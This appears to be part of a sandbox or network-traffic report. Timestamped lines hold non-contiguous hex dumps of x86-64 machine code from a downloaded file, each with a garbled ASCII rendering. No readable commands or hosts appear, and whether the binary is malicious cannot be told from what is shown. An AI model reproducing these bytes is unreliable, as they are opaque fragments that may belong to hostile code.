                                                                                                                                                                                2021-11-11 11:26:26 UTC6428INData Raw: f8 4c 8b c1 48 8b d9 e8 28 e1 ff ff 84 c0 74 22 48 8b 03 48 85 c0 74 1a 8b 48 20 48 8b 40 28 81 e1 00 ff 00 00 89 0f 48 8b 5c 24 30 48 83 c4 20 5f c3 33 c0 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc cc cc cc 48 89 5c 24 08 57 48 83 ec 20 33 ff 48 8b d9 48 83 c1 10 48 89 79 f0 e8 04 28 00 00 48 8d 8b 18 01 00 00 e8 d8 e6 ff ff 48 8d 8b 38 01 00 00 e8 cc e6 ff ff 48 8d 8b 58 01 00 00 e8 c0 e6 ff ff 48 8d 8b 78 01 00 00 e8 b4 e6 ff ff 48 8d 8b c0 01 00 00 e8 68 03 00 00 8d 4f 08 e8 28 58 00 00 48 85 c0 0f 84 97 0e 02 00 48 89 38 48 8d 0d 6d a1 08 00 48 89 03 ff 15 0c 67 08 00 89 43 08 48 8b c3 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc cc 48 89 5c 24 08 57 48 83 ec 30 48 8b f9 48 8d 4c 24 58 49 8b d8 ff 15 05 5c 08 00 85 c0 0f 84 9d 17 02 00 0f 29 74 24 20 66 0f ef
                                                                                                                                                                                Data Ascii: LH(t"HHtH H@(H\$0H _3H\$0H _H\$WH 3HHHy(HH8HXHxHhO(XHH8HmHgCHH\$0H _H\$WH0HHL$XI\)t$ f
                                                                                                                                                                                2021-11-11 11:26:26 UTC6429INData Raw: 5f c3 cc cc 40 53 48 83 ec 20 48 8b d9 e8 42 00 00 00 48 8d 4b 28 c6 43 20 00 e8 35 00 00 00 45 33 db 4c 89 5b 48 4c 89 5b 58 44 89 5b 60 44 89 5b 64 44 89 5b 68 c7 43 6c 00 28 00 00 c7 43 70 00 20 00 00 48 8b c3 48 83 c4 20 5b c3 cc cc cc cc cc cc cc 40 53 48 83 ec 20 48 8b d9 48 c7 41 08 00 00 00 00 48 c7 41 10 10 00 00 00 b9 10 00 00 00 e8 55 54 00 00 48 8b cb 48 89 03 c6 00 00 e8 4f fe ff ff 48 8b c3 48 83 c4 20 5b c3 cc cc cc cc cc cc 48 89 5c 24 08 57 48 83 ec 20 48 8b 42 08 48 8b d9 48 8b fa 48 8b 08 e8 c4 ed ff ff 85 c0 0f 8e 3c 99 02 00 ff 15 5e 64 08 00 89 83 30 05 00 00 48 8b 47 08 48 8b 08 e8 a4 ed ff ff 33 d2 48 8b cb 89 83 28 05 00 00 c7 83 c4 01 00 00 02 00 00 00 e8 ea 57 ff ff 33 c0 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc cc cc cc cc cc cc
                                                                                                                                                                                Data Ascii: _@SH HBHK(C 5E3L[HL[XD[`D[dD[hCl(Cp HH [@SH HHAHAUTHHOHH [H\$WH HBHHH<^d0HGH3H(W3H\$0H _
                                                                                                                                                                                2021-11-11 11:26:26 UTC6445INData Raw: 00 48 8b 0d d4 fa 09 00 33 d2 48 89 05 c3 fa 09 00 ff 15 c5 23 08 00 48 8b 0d be fa 09 00 33 d2 48 83 c4 60 5b 48 ff 25 b0 23 08 00 cc cc cc cc cc cc cc cc 48 89 5c 24 08 48 89 74 24 10 57 48 81 ec 80 00 00 00 b9 0f 00 00 00 ff 15 b3 23 08 00 ba 00 7f 00 00 33 c9 48 8b d8 ff 15 9b 23 08 00 48 8b 0d 84 fa 09 00 ba 63 00 00 00 48 8b f8 ff 15 7e 23 08 00 48 8b 0d 6f fa 09 00 ba a4 00 00 00 48 89 05 8b 04 0b 00 ff 15 65 23 08 00 48 8b 0d 56 fa 09 00 ba a2 00 00 00 48 89 05 82 04 0b 00 ff 15 4c 23 08 00 48 8b 0d 3d fa 09 00 33 f6 48 89 05 74 04 0b 00 48 8b 05 dd 2d 0b 00 44 8d 4e 10 40 38 70 33 0f 84 77 e9 01 00 8d 56 63 44 8d 46 01 89 74 24 28 44 89 4c 24 20 ff 15 e9 1f 08 00 4c 8b d8 48 89 05 2f 04 0b 00 48 8b 05 f8 f9 09 00 48 89 44 24 48 48 8d 05 04 5a 08
                                                                                                                                                                                Data Ascii: H3H#H3H`[H%#H\$Ht$WH#3H#HcH~#HoHe#HVHL#H=3HtH-DN@8p3wVcDFt$(DL$ LH/HHD$HHZ
                                                                                                                                                                                2021-11-11 11:26:26 UTC6446INData Raw: c0 48 89 44 24 20 ff 15 68 12 08 00 85 c0 75 2e 48 8b 4c 24 60 48 8d 44 24 58 45 33 c9 48 89 44 24 28 45 33 c0 48 8b d7 48 89 5c 24 20 ff 15 39 12 08 00 48 8b 4c 24 60 ff 15 26 12 08 00 48 8b 5c 24 40 48 83 c4 30 5f c3 cc cc cc cc cc cc cc cc cc cc cc 40 53 48 83 ec 20 83 79 08 05 48 8b d9 0f 85 7d d2 01 00 4c 8b 19 33 c0 41 89 83 18 02 00 00 48 83 c4 20 5b c3 cc cc cc cc cc cc cc cc cc cc cc 48 83 ec 28 b9 48 00 00 00 e8 3a 10 00 00 48 85 c0 0f 84 99 d7 01 00 48 89 5c 24 20 48 8b d8 e8 2c 00 00 00 48 8b d0 48 8b cb e8 f1 cf ff ff 48 8b 5c 24 20 48 89 05 dd 29 0b 00 48 8d 05 d6 29 0b 00 48 83 c4 28 c3 cc cc cc cc cc cc cc cc cc 48 83 ec 28 8b 05 9a f5 09 00 a8 01 75 15 83 c8 01 48 8d 0d 38 b3 01 00 89 05 86 f5 09 00 e8 b1 0c 00 00 48 8d 05 7e f5 09 00 48
                                                                                                                                                                                Data Ascii: HD$ hu.HL$`HD$XE3HD$(E3HH\$ 9HL$`&H\$@H0_@SH yH}L3AH [H(H:HH\$ H,HHH\$ H)H)H(H(uH8H~H
                                                                                                                                                                                2021-11-11 11:26:26 UTC6462INData Raw: c7 00 16 00 00 00 83 c8 ff eb 6a 83 e0 ef 33 ed 89 41 18 41 83 f8 01 75 09 e8 8e fd ff ff 8b fd 03 f0 48 8b cb e8 ca f0 ff ff 44 8b 5b 18 45 84 db 79 0a 41 83 e3 fc 44 89 5b 18 eb 1a 41 f6 c3 01 74 14 41 f6 c3 08 74 0e 41 0f ba e3 0a 72 07 c7 43 24 00 02 00 00 48 8b cb e8 a5 ec ff ff 44 8b c7 8b d6 8b c8 e8 a9 b6 00 00 83 f8 ff 40 0f 95 c5 8d 45 ff 48 8b 5c 24 30 48 8b 6c 24 38 48 8b 74 24 40 48 83 c4 20 5f c3 cc cc 48 89 5c 24 10 48 89 74 24 18 48 89 4c 24 08 57 48 83 ec 30 41 8b d8 8b f2 48 8b f9 33 c0 48 85 c9 0f 95 c0 85 c0 75 25 e8 1f 4c 00 00 c7 00 16 00 00 00 48 83 64 24 20 00 45 33 c9 45 33 c0 33 d2 33 c9 e8 34 4b 00 00 83 c8 ff eb 52 85 db 74 2f 83 fb 01 74 2a 83 fb 02 74 25 e8 ec 4b 00 00 c7 00 16 00 00 00 48 83 64 24 20 00 45 33 c9 45 33 c0 33
                                                                                                                                                                                Data Ascii: j3AAuHD[EyAD[AtAtArC$HD@EH\$0Hl$8Ht$@H _H\$Ht$HL$WH0AH3Hu%LHd$ E3E3334KRt/t*t%KHd$ E3E33
                                                                                                                                                                                2021-11-11 11:26:26 UTC6463INData Raw: 41 0f 6e c8 f2 0f 11 18 48 8b 44 24 78 f3 0f e6 c9 f2 0f 59 4c 24 60 f2 0f 59 cf 0f 28 7c 24 10 66 0f 28 c1 f2 0f 58 c6 66 0f 28 d0 f2 0f 59 15 90 e3 07 00 f2 0f 58 15 80 e3 07 00 f2 0f 59 d0 f2 0f 58 15 6c e3 07 00 f2 0f 59 d0 f2 0f 58 15 58 e3 07 00 f2 0f 59 d0 f2 0f 59 c0 f2 0f 58 d5 f2 0f 59 d0 66 0f 28 c4 f2 0f 58 c3 f2 0f 58 d1 f2 0f 58 d6 0f 28 74 24 20 f2 0f 59 d0 f2 0f 58 d4 f2 0f 11 10 48 83 c4 38 c3 cc cc 48 83 ec 58 48 ba ff ff ff ff ff ff ff 7f f2 0f 11 44 24 78 66 0f 28 e0 48 8b 4c 24 78 48 8b c1 48 23 c2 48 ba ef 39 fa fe 42 2e 86 40 48 3b c2 0f 82 10 01 00 00 48 ba 00 00 00 00 00 00 f0 7f 48 3b c2 72 79 48 b8 ff ff ff ff ff ff 0f 00 48 85 c8 74 4e 66 0f 57 c0 c7 44 24 40 01 00 00 00 49 b8 00 00 00 00 00 00 08 00 f2 0f 11 44 24 38 f2 0f 11
                                                                                                                                                                                Data Ascii: AnHD$xYL$`Y(|$f(Xf(YXYXlYXXYYXYf(XXX(t$ YXH8HXHD$xf(HL$xHH#H9B.@H;HH;ryHHtNfWD$@ID$8
                                                                                                                                                                                2021-11-11 11:26:26 UTC6479INData Raw: 89 46 0c 44 89 66 08 eb 03 89 5e 08 48 8d 7e 10 0f b7 c3 b9 06 00 00 00 66 f3 ab e9 e0 00 00 00 39 1d 2e 63 09 00 0f 85 b7 fe ff ff 83 c8 ff e9 d6 00 00 00 48 8d 4e 1c 33 d2 41 b8 01 01 00 00 e8 cf 92 ff ff 48 8d 6c 6d 00 4c 8d 1d 5b f6 08 00 48 03 ed 41 ba 04 00 00 00 4d 8d 44 ed 10 49 8b c8 41 38 18 74 31 38 59 01 74 2c 0f b6 11 0f b6 41 01 3b d0 77 19 4c 8d 4c 32 1d 41 8a 03 41 03 d4 41 08 01 0f b6 41 01 4d 03 cc 3b d0 76 ec 48 83 c1 02 38 19 75 cf 49 83 c0 08 4d 03 dc 4d 2b d4 75 bb 89 7e 04 81 ef a4 03 00 00 44 89 66 08 74 24 83 ef 04 74 18 83 ef 0d 74 0c 41 3b fc 75 1a bb 04 04 00 00 eb 13 bb 12 04 00 00 eb 0c bb 04 08 00 00 eb 05 bb 11 04 00 00 89 5e 0c 48 8d 56 10 49 8d 7c ed 04 b9 06 00 00 00 0f b7 07 48 83 c7 02 66 89 02 48 83 c2 02 49 2b cc 75
                                                                                                                                                                                Data Ascii: FDf^H~f9.cHN3AHlmL[HAMDIA8t18Yt,A;wLL2AAAAM;vH8uIMM+u~Dft$ttA;u^HVI|HfHI+u
                                                                                                                                                                                2021-11-11 11:26:26 UTC6480INData Raw: 00 00 e8 b5 98 ff ff 48 8b 8b 48 01 00 00 bf 80 00 00 00 48 2b cf e8 a1 98 ff ff 48 8b 8b 50 01 00 00 48 2b cf e8 92 98 ff ff 48 8b 8b 30 01 00 00 e8 86 98 ff ff 48 8b 8b 58 01 00 00 48 8d 05 e0 02 09 00 48 3b c8 74 1a 83 b9 60 01 00 00 00 75 11 e8 d5 b4 00 00 48 8b 8b 58 01 00 00 e8 59 98 ff ff 48 8d 7b 58 be 06 00 00 00 48 8d 05 41 f3 08 00 48 39 47 f0 74 12 48 8b 0f 48 85 c9 74 0a 83 39 00 75 05 e8 31 98 ff ff 48 83 7f f8 00 74 13 48 8b 4f 08 48 85 c9 74 0a 83 39 00 75 05 e8 17 98 ff ff 48 83 c7 20 48 83 ee 01 75 bd 48 8b cb 48 8b 5c 24 30 48 8b 74 24 38 48 83 c4 20 5f e9 f6 97 ff ff cc cc f0 83 01 01 48 8b 81 10 01 00 00 48 85 c0 74 04 f0 83 00 01 48 8b 81 20 01 00 00 48 85 c0 74 04 f0 83 00 01 48 8b 81 18 01 00 00 48 85 c0 74 04 f0 83 00 01 48 8b 81
                                                                                                                                                                                Data Ascii: HHH+HPH+H0HXHH;t`uHXYH{XHAH9GtHHt9u1HtHOHt9uH HuHH\$0Ht$8H _HHtH HtHHtH
                                                                                                                                                                                2021-11-11 11:26:26 UTC6496INData Raw: 1c 41 b8 01 00 00 00 48 8b d3 48 8d 4c 24 44 e8 68 85 00 00 83 f8 ff 0f 84 55 01 00 00 48 83 64 24 38 00 48 83 64 24 30 00 8b 4c 24 58 48 8d 44 24 5c 4c 8d 44 24 44 41 b9 01 00 00 00 33 d2 c7 44 24 28 05 00 00 00 48 ff c3 48 89 44 24 20 ff 15 8f 4c 07 00 8b e8 85 c0 0f 84 13 01 00 00 48 8b 44 24 50 48 83 64 24 20 00 48 8d 0d 43 62 0a 00 48 8b 0c c1 4c 8d 4c 24 4c 48 8d 54 24 5c 49 8b 0c 0f 44 8b c5 ff 15 b0 4c 07 00 85 c0 0f 84 42 01 00 00 8b fb 41 2b fc 03 7c 24 40 39 6c 24 4c 0f 8c cb 00 00 00 bd 0d 00 00 00 45 85 f6 0f 84 af 00 00 00 48 8b 44 24 50 48 83 64 24 20 00 40 88 6c 24 5c 48 8d 0d e8 61 0a 00 4c 8d 4c 24 4c 44 8d 45 f4 48 8b 0c c1 48 8d 54 24 5c 49 8b 0c 0f ff 15 54 4c 07 00 85 c0 0f 84 e6 00 00 00 83 7c 24 4c 01 7c 7b ff 44 24 40 ff c7 eb 65
                                                                                                                                                                                Data Ascii: AHHL$DhUHd$8Hd$0L$XHD$\LD$DA3D$(HHD$ LHD$PHd$ HCbHLL$LHT$\IDLBA+|$@9l$LEHD$PHd$ @l$\HaLL$LDEHHT$\ITL|$L|{D$@e
                                                                                                                                                                                2021-11-11 11:26:26 UTC6497INData Raw: fa a8 06 00 00 72 c8 48 83 64 24 38 00 48 83 64 24 30 00 48 8d 44 24 70 2b c8 4c 8d 44 24 70 c7 44 24 28 55 0d 00 00 8b c1 b9 e9 fd 00 00 99 2b c2 33 d2 d1 f8 44 8b c8 48 8d 84 24 20 07 00 00 48 89 44 24 20 ff 15 99 48 07 00 44 8b f0 85 c0 0f 84 80 fd ff ff 33 f6 48 8b 44 24 50 48 83 64 24 20 00 48 63 ce 48 8d 94 0c 20 07 00 00 45 8b c6 48 8d 0d 3c 5e 0a 00 48 8b 0c c1 4c 8d 4c 24 48 44 2b c6 49 8b 0c 0f ff 15 ae 48 07 00 85 c0 74 0b 03 74 24 48 44 3b f6 7f bd eb 08 ff 15 41 4b 07 00 8b d8 44 3b f6 0f 8f c8 fc ff ff 8b fd 41 b8 0d 00 00 00 41 2b fc 41 3b fd 0f 82 06 ff ff ff e9 af fc ff ff 49 8b 0c 0f 48 21 7c 24 20 4c 8d 4c 24 48 45 8b c5 49 8b d4 ff 15 5b 48 07 00 85 c0 74 0b 8b 7c 24 48 33 db e9 8f fc ff ff ff 15 ee 4a 07 00 8b d8 e9 82 fc ff ff 8b cb
                                                                                                                                                                                Data Ascii: rHd$8Hd$0HD$p+LD$pD$(U+3DH$ HD$ HD3HD$PHd$ HcH EH<^HLL$HD+IHtt$HD;AKD;AA+A;IH!|$ LL$HEI[Ht|$H3J
                                                                                                                                                                                2021-11-11 11:26:26 UTC6513INData Raw: 49 8b 04 24 44 88 30 48 8d 84 24 a8 00 00 00 48 89 44 24 38 4c 89 74 24 30 89 74 24 28 49 8b 44 24 08 48 89 44 24 20 45 8b cf 4c 8d 05 9b e1 08 00 33 d2 8b cb ff 15 a9 08 07 00 41 3b c6 74 15 44 39 b4 24 a8 00 00 00 75 0b 49 8b 44 24 08 44 88 70 3f eb 08 49 8b 44 24 08 44 88 30 be 01 00 00 00 8b 9c 24 90 00 00 00 e8 0e 0b 00 00 89 18 8b 9c 24 98 00 00 00 e8 f0 0a 00 00 89 18 8b 9c 24 a0 00 00 00 e8 ea 0a 00 00 89 18 b9 07 00 00 00 e8 1a 86 ff ff 41 3b f6 0f 85 67 01 00 00 41 bf 03 00 00 00 4d 8b cf 4c 8b c7 41 8d 57 3d 49 8b 0c 24 e8 04 34 00 00 41 3b c6 74 14 4c 89 74 24 20 45 33 c9 45 33 c0 33 d2 33 c9 e8 0f 7e ff ff 49 03 ff 80 3f 2d 75 09 41 bd 01 00 00 00 48 ff c7 48 8b cf e8 da 6e 00 00 44 8b d8 45 69 db 10 0e 00 00 44 89 9c 24 90 00 00 00 b3 30 40
                                                                                                                                                                                Data Ascii: I$D0H$HD$8Lt$0t$(ID$HD$ EL3A;tD9$uID$Dp?ID$D0$$$A;gAMLAW=I$4A;tLt$ E3E333~I?-uAHHnDEiD$0@
                                                                                                                                                                                2021-11-11 11:26:26 UTC6514INData Raw: 00 44 03 94 24 80 00 00 00 8b 84 24 88 00 00 00 6b c0 3c 03 84 24 90 00 00 00 6b c0 3c 03 84 24 98 00 00 00 69 c0 e8 03 00 00 03 84 24 a0 00 00 00 41 83 fc 01 75 15 44 89 15 2a 7a 08 00 89 05 28 7a 08 00 89 1d 1a 7a 08 00 eb 71 48 8d 4c 24 50 44 89 15 20 7a 08 00 89 05 1e 7a 08 00 e8 89 06 00 00 85 c0 74 15 48 83 64 24 20 00 45 33 c9 45 33 c0 33 d2 33 c9 e8 64 7a ff ff 8b 0d fa 79 08 00 8b 44 24 50 69 c0 e8 03 00 00 03 c8 b8 00 5c 26 05 89 0d e3 79 08 00 79 0a 03 c8 ff 0d d5 79 08 00 eb 0c 3b c8 7c 0e 2b c8 ff 05 c7 79 08 00 89 0d c5 79 08 00 89 1d b7 79 08 00 48 8b 5c 24 58 48 8b 6c 24 60 48 83 c4 30 41 5c 5f 5e c3 48 8b c4 48 89 58 08 48 89 68 18 48 89 70 20 57 41 54 41 55 48 83 ec 60 48 8b f9 48 8d 48 10 33 db 89 58 10 e8 b3 05 00 00 3b c3 74 14 45 33
                                                                                                                                                                                Data Ascii: D$$k<$k<$i$AuD*z(zzqHL$PD zztHd$ E3E333dzyD$Pi\&yyy;|+yyyH\$XHl$`H0A\_^HHXHhHp WATAUH`HHH3X;tE3
                                                                                                                                                                                2021-11-11 11:26:26 UTC6530INData Raw: 49 3b c8 7c 08 8b 02 89 44 8c 20 eb 04 89 5c 8c 20 48 2b ce 48 83 ea 04 48 3b cb 7d e3 44 8b 0d 28 3d 08 00 45 8b e7 41 8b c1 99 41 23 d7 03 c2 44 8b d8 41 23 c7 41 c1 fb 05 2b c2 4d 63 f3 44 2b e0 42 8b 4c b4 20 44 0f a3 e1 0f 83 9b 00 00 00 41 8b cc 41 8b c5 4d 63 c3 d3 e0 f7 d0 42 85 44 84 20 75 19 42 8d 04 06 48 98 eb 09 39 5c 84 20 75 0b 48 03 c6 48 83 f8 03 7c f1 eb 6e 41 8d 41 ff 41 8b cf 44 8b ce 99 41 23 d7 03 c2 44 8b c0 41 23 c7 2b c2 41 c1 f8 05 2b c8 4d 63 d0 42 8b 44 94 20 41 d3 e1 8b cb 42 8d 14 08 3b d0 72 05 41 3b d1 73 02 8b ce 44 2b c6 42 89 54 94 20 49 63 d0 48 3b d3 7c 24 3b cb 74 20 8b 44 94 20 8b cb 44 8d 40 01 44 3b c0 72 05 44 3b c6 73 02 8b ce 44 89 44 94 20 48 2b d6 79 dc 41 8b cc 41 8b c5 d3 e0 42 21 44 b4 20 41 8d 43 01 48 63
                                                                                                                                                                                Data Ascii: I;|D \ H+HH;}D(=EAA#DA#A+McD+BL DAAMcBD uBH9\ uHH|nAAADA#DA#+A+McBD AB;rA;sD+BT IcH;|$;t D D@D;rD;sDD H+yAAB!D ACHc
                                                                                                                                                                                2021-11-11 11:26:26 UTC6531INData Raw: 89 5c 24 20 89 5c 24 28 bb 02 00 00 00 e9 25 05 00 00 44 8b 0d 4b 39 08 00 48 8d 4c 24 20 45 8b df 48 8b 01 41 83 cd ff 89 bc 24 90 00 00 00 48 89 44 24 30 8b 41 08 44 8b e3 89 44 24 38 41 8b c1 99 41 23 d7 03 c2 44 8b d0 41 23 c7 41 c1 fa 05 2b c2 4d 63 f2 44 2b d8 42 8b 4c b4 20 44 0f a3 d9 0f 83 99 00 00 00 41 8b cb 41 8b c5 4d 63 c2 d3 e0 f7 d0 42 85 44 84 20 75 19 42 8d 04 06 48 98 eb 09 39 5c 84 20 75 0b 48 03 c6 48 83 f8 03 7c f1 eb 6c 41 8d 41 ff 41 8b cf 99 41 23 d7 03 c2 44 8b c0 41 23 c7 2b c2 41 c1 f8 05 8b d6 2b c8 4d 63 c8 42 8b 44 8c 20 d3 e2 8d 0c 10 3b c8 72 04 3b ca 73 03 44 8b e6 44 2b c6 42 89 4c 8c 20 49 63 d0 48 3b d3 7c 27 44 3b e3 74 22 8b 44 94 20 44 8b e3 44 8d 40 01 44 3b c0 72 05 44 3b c6 73 03 44 8b e6 44 89 44 94 20 48 2b d6
                                                                                                                                                                                Data Ascii: \$ \$(%DK9HL$ EHA$HD$0ADD$8AA#DA#A+McD+BL DAAMcBD uBH9\ uHH|lAAAA#DA#+A+McBD ;r;sDD+BL IcH;|'D;t"D DD@D;rD;sDDD H+
                                                                                                                                                                                2021-11-11 11:26:26 UTC6547INData Raw: 16 39 5c 24 64 75 10 39 5c 24 60 75 0a 66 89 5c 24 6a e9 53 02 00 00 66 3b cb 75 18 8b 42 08 66 45 03 c3 0f ba f0 1f 3b c3 75 09 39 5a 04 75 04 39 1a 74 af be 01 00 00 00 44 8b e3 48 8d 4c 24 54 44 8d 56 04 44 3b d3 43 8d 04 24 44 89 54 24 34 4c 63 c8 7e 55 41 8b fc 4e 8d 74 0c 60 4c 8d 7a 08 23 fe 41 0f b7 06 45 0f b7 0f 44 8b db 44 0f af c8 8b 41 fc 42 8d 2c 08 3b e8 72 05 41 3b e9 73 03 44 8b de 89 69 fc 44 3b db 74 03 66 01 31 44 8b 5c 24 34 49 83 c6 02 49 83 ef 02 44 2b de 44 3b db 44 89 5c 24 34 7f b9 44 2b d6 48 83 c1 02 44 03 e6 44 3b d3 7f 8b 44 8b 54 24 58 44 8b 4c 24 50 b8 02 c0 00 00 66 44 03 c0 41 bc ff ff 00 00 66 44 3b c3 7e 45 41 0f ba e2 1f 72 38 44 8b 5c 24 54 41 8b d1 45 03 d2 c1 ea 1f 45 03 c9 41 8b cb c1 e9 1f 43 8d 04 1b 66 45 03 c4
                                                                                                                                                                                Data Ascii: 9\$du9\$`uf\$jSf;uBfE;u9Zu9tDHL$TDVD;C$DT$4Lc~UANt`Lz#AEDDAB,;rA;sDiD;tf1D\$4IID+D;D\$4D+HDD;DT$XDL$PfDAfD;~EAr8D\$TAEEACfE
                                                                                                                                                                                2021-11-11 11:26:26 UTC6548INData Raw: e9 1c 0a 00 00 66 3b fd 0f 85 bc 00 00 00 b8 00 00 00 80 66 44 89 1b 44 3b c8 75 05 45 3b d4 74 10 41 0f ba e1 1e 72 09 4c 8d 05 35 bd 06 00 eb 66 66 41 3b cc 74 17 41 81 f9 00 00 00 c0 75 0e 45 3b d4 75 4b 4c 8d 05 10 bd 06 00 eb 11 44 3b c8 75 3d 45 3b d4 75 38 4c 8d 05 f5 bc 06 00 48 8d 4b 04 ba 16 00 00 00 e8 27 a9 ff ff 41 3b c4 74 14 45 33 c9 45 33 c0 33 d2 33 c9 4c 89 64 24 20 e8 5a f2 fe ff b8 05 00 00 00 88 43 03 eb 32 4c 8d 05 b5 bc 06 00 48 8d 4b 04 ba 16 00 00 00 e8 ef a8 ff ff 41 3b c4 74 14 45 33 c9 45 33 c0 33 d2 33 c9 4c 89 64 24 20 e8 22 f2 fe ff c6 43 03 06 45 8b dc e9 57 09 00 00 44 0f b7 c7 41 8b c9 44 89 4c 24 76 c1 e9 18 41 8b c0 44 89 54 24 72 c1 e8 08 4c 8d 0d 89 f4 07 00 41 bd 05 00 00 00 45 69 c0 10 4d 00 00 8d 14 48 49 83 e9 60
                                                                                                                                                                                Data Ascii: f;fDD;uE;tArL5ffA;tAuE;uKLD;u=E;u8LHK'A;tE3E333Ld$ ZC2LHKA;tE3E333Ld$ "CEWDADL$vADT$rLAEiMHI`
                                                                                                                                                                                2021-11-11 11:26:26 UTC6564INData Raw: 50 ff d0 48 8d 4c 24 38 e8 f7 a8 00 00 90 e9 12 fa fd ff 48 8d 4c 24 50 ff 15 b6 3c 06 00 48 8d 4c 24 38 e8 dc a8 00 00 90 e9 f7 f9 fd ff cc cc cc cc cc cc 33 c0 e9 7d 28 fe ff cc cc cc cc cc cc cc cc cc ba 92 00 00 00 eb 05 ba 73 00 00 00 48 8d 0d 1d 2b 09 00 41 83 c8 ff e8 34 ca 03 00 b8 01 00 00 00 48 83 c4 28 c3 ba 77 00 00 00 eb df ba 97 00 00 00 eb d8 ba a0 00 00 00 eb d1 ba b4 00 00 00 eb ca 44 3b c2 74 b9 44 3b ca 74 da 39 54 24 50 74 db 39 54 24 58 74 dc 39 54 24 60 74 dd 39 54 24 68 74 a3 e9 a1 00 fe ff cc cc cc cc cc cc cc 49 8b 43 08 66 83 78 08 7f 0f 85 73 02 00 00 41 8b c1 44 89 64 24 40 48 8d 54 24 40 ff c0 48 8d 4c 24 48 41 ff c4 89 84 24 28 01 00 00 e8 de da fc ff 44 8b 8c 24 28 01 00 00 e9 7a de fc ff ff 44 24 44 44 89 64 24 40 48 8d 54
                                                                                                                                                                                Data Ascii: PHL$8HL$P<HL$83}(sH+A4H(wD;tD;t9T$Pt9T$Xt9T$`t9T$htICfxsADd$@HT$@HL$HA$(D$(zD$DDd$@HT
                                                                                                                                                                                2021-11-11 11:26:26 UTC6565INData Raw: 8d 0d 6e 27 09 00 e9 5f ff ff ff 41 83 c8 ff ba 81 00 00 00 48 8d 0d 59 27 09 00 e9 4a ff ff ff 41 83 c8 ff 48 8d 0d 49 27 09 00 41 8d 50 76 e9 36 ff ff ff 41 83 c8 ff ba 95 00 00 00 48 8d 0d 30 27 09 00 e9 21 ff ff ff 41 83 c8 ff ba 96 00 00 00 48 8d 0d 1b 27 09 00 e9 0c ff ff ff 48 8b 43 08 ba 9f 00 00 00 48 8b 0c e8 44 0f bf 41 0a 48 8d 0d fd 26 09 00 e9 ee fe ff ff 41 83 c8 ff ba a1 00 00 00 48 8d 0d e8 26 09 00 e9 d9 fe ff ff cc cc cc 41 8b 0a ba 6f 00 00 00 ff c9 48 8b 0c c8 44 0f bf 41 0a 48 8b cb e8 e5 c5 03 00 b8 01 00 00 00 e9 59 c5 fd ff cc cc cc cc cc cc cc cc cc cc cc 48 8d 0d a9 26 09 00 41 83 c8 ff ba 83 00 00 00 e8 bb c5 03 00 b8 01 00 00 00 48 83 c4 28 c3 cc 8b 0f 48 8b 04 ca 44 8b 00 41 83 f8 24 75 1f c6 84 24 f0 00 00 00 01 8d 41 01 89
                                                                                                                                                                                Data Ascii: n'_AHY'JAHI'APv6AH0'!AH'HCHDAH&AH&AoHDAHYH&AH(HDA$u$A
                                                                                                                                                                                2021-11-11 11:26:26 UTC6581INData Raw: 48 8b 0b 48 89 41 08 48 8b 03 48 8b 48 08 c6 01 00 e9 96 f4 fc ff b9 28 00 00 00 e8 ac f4 fd ff 48 85 c0 74 81 49 8b d7 48 8b c8 e8 e4 aa 04 00 48 89 03 e9 74 f4 fc ff 48 8b 47 10 48 8b 48 48 e9 75 f4 fc ff 48 8b 0d 98 ef 08 00 ba 01 00 00 00 48 8b 69 10 e8 4a a7 04 00 48 89 2d 83 ef 08 00 c6 05 85 ef 08 00 00 e9 65 f4 fc ff c6 05 79 ef 08 00 01 e9 51 f5 fc ff 48 8b cd e8 b3 d7 fc ff 90 e9 87 f4 fc ff 48 8b 0e e8 c5 ef fd ff 48 8b 4e 18 e8 bc ef fd ff 90 e9 9f f4 fc ff 33 f6 e9 a6 f4 fc ff 48 8b 0f 48 85 c9 0f 84 a6 f4 fc ff ff 15 ad fd 05 00 48 8b 0f e8 95 ef fd ff 90 e9 b6 f4 fc ff 48 8b 0f 48 85 c9 0f 84 aa f4 fc ff ba 01 00 00 00 e8 e9 93 01 00 90 e9 9a f4 fc ff 48 8b cf e8 8b b7 fd ff 90 e9 8c f4 fc ff 48 8b 0f 48 8b 49 08 e8 59 ef fd ff 48 8b 0f e8
                                                                                                                                                                                Data Ascii: HHAHHH(HtIHHtHGHHHuHHiJH-eyQHHHN3HHHHHHHHIYH
                                                                                                                                                                                2021-11-11 11:26:26 UTC6582INData Raw: 6a 69 03 00 bf 69 03 00 cb 69 03 00 fd 69 03 00 6b 6a 03 00 14 6f 03 00 14 6f 03 00 c2 68 00 00 e8 6e 03 00 14 6f 03 00 14 6f 03 00 3f 6f 03 00 8c 6f 03 00 97 6f 03 00 c8 6f 03 00 32 70 03 00 21 74 03 00 2a 74 03 00 2a 74 03 00 ca 6c 00 00 35 74 03 00 2a 74 03 00 2a 74 03 00 7f 74 03 00 cc 74 03 00 d6 74 03 00 07 75 03 00 6f 75 03 00 8d 78 03 00 7b 78 03 00 95 78 03 00 e5 78 03 00 8d 78 03 00 8d 78 03 00 31 79 03 00 7d 79 03 00 8c 79 03 00 bd 79 03 00 22 7a 03 00 cc cc cc cc cc cc cc cc 48 8b 08 48 8d 84 24 a8 00 00 00 4c 8d 8c 24 b8 00 00 00 48 8b 11 48 89 44 24 28 48 8d 84 24 b0 00 00 00 4c 8d 84 24 a0 00 00 00 48 8b cf 48 89 44 24 20 e8 e8 eb 03 00 3c 01 75 15 8b 94 24 a0 00 00 00 44 0f b6 c0 48 8b cf ff c2 e8 8f a3 04 00 48 8d 54 24 38 48 8d 4c 24 30
                                                                                                                                                                                Data Ascii: jiiiikjoohnoo?oooo2p!t*t*tl5t*t*ttttuoux{xxxxx1y}yyy"zHH$L$HHD$(H$L$HHD$ <u$DHHT$8HL$0
